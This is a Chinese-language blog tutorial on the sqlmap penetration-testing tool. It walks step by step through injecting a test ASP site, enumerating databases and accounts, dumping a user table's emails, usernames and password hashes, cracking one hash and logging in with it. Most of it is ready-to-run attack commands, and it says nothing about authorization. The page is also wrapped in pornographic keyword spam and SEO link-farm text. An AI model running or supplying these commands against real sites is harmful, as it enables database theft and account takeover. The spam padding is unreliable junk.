久久精品人人爽,华人av在线,亚洲性视频网站,欧美专区一二三

滲透測試工具sqlmap怎么用

148次閱讀
沒有評論

共計 2081 個字符,預計需要花費 6 分鐘才能閱讀完成。

這篇文章主要介紹滲透測試工具 sqlmap 怎么用,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

一、檢測注入點是否可用

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134

參數:

-u:指定注入點 url

注入結果展示:

(1)注入參數 id 為 GET 注入,注入類型有四種分別為:boolean-based blind、error-based、stacked queries、inline query。

(2)web 服務器系統為 windows 2003 or XP

(3)web 應用程序技術為:ASP.NET, Microsoft IIS 6.0

(4)數據庫類型為:SQLSERVER 2000

其中圖一有若干詢問語句,需要用戶輸入[Y/N],如果你懶得輸入或者不懂怎么輸入可以讓程序自動輸入,只需添加一個參數即可,命令如下:

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --batch

二、暴庫

一條命令即可曝出該 sqlserver 中所有數據庫名稱,命令如下:

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --dbs

參數:

–dbs:dbs 前面有兩條杠,請看清楚。

結果顯示該 sqlserver 中共包含 7 個可用的數據庫。

三、web 當前使用的數據庫

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --current-db

四、web 數據庫使用賬戶

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --current-user

五、列出 sqlserver 所有用戶

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --users

六、數據庫賬戶與密碼

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 --passwords

七、列出數據庫中的表

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 -D tourdata --tables

參數:

-D:指定數據庫名稱

–tables:列出表

結果體現共列出了 34 張表。

八、列出表中字段

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 -D tourdata -T userb --columns

參數:

-D:指定數據庫名稱

-T:指定要列出字段的表

–columns:指定列出字段

結果顯示該 userb 表中包含了 23 條字段。

九、暴字段內容

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 -D tourdata -T userb -C  email,Username,userpassword  --dump

參數:

-C:指定要暴的字段

–dump:將結果導出

如果字段內容太多,需要花費很多時間。可以指定導出特定范圍的字段內容,命令如下:

C:\Python27\sqlmap python sqlmap.py -u  http://192.168.1.150/products.asp?id=134 -D tourdata -T userb -C  email,Username,userpassword  --start 1 --stop 10 --dump

參數:

–start:指定開始的行

–stop:指定結束的行

此條命令的含義為:導出數據庫 tourdata 中的表 userb 中的字段 (email,Username,userpassword) 中的第 1 到第 10 行的數據內容。

滲透測試工具 sqlmap 怎么用

十、驗證結果

通過上圖結果看到其中的一個用戶信息為:

email:123456@qq.com

username: 1.asp

password: 49ba59abbe56e057

通過 md5 解密,得到該 hash 的原文密碼為:123456

拿到賬號密碼我們來測試是否可以登錄

滲透測試工具 sqlmap 怎么用

驗證成功!

以上是“滲透測試工具 sqlmap 怎么用”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注丸趣 TV 行業資訊頻道!

正文完
 
丸趣
版權聲明:本站原創文章,由 丸趣 2023-07-15發表,共計2081字。
轉載說明:除特殊說明外本站除技術相關以外文章皆由網絡搜集發布,轉載請注明出處。
評論(沒有評論)
主站蜘蛛池模板: 扶绥县| 棋牌| 远安县| 都兰县| 宜州市| 密云县| 漠河县| 武陟县| 红安县| 茌平县| 婺源县| 呼和浩特市| 通榆县| 西吉县| 甘德县| 商城县| 阿拉善右旗| 肃南| 扎赉特旗| 莎车县| 商丘市| 建始县| 鹿邑县| 桃源县| 屏东市| 凤山市| 班戈县| 丁青县| 泾阳县| 弥勒县| 韩城市| 荥经县| 二连浩特市| 济源市| 化德县| 上虞市| 阿拉善盟| 柳河县| 宁夏| 广宗县| 谷城县|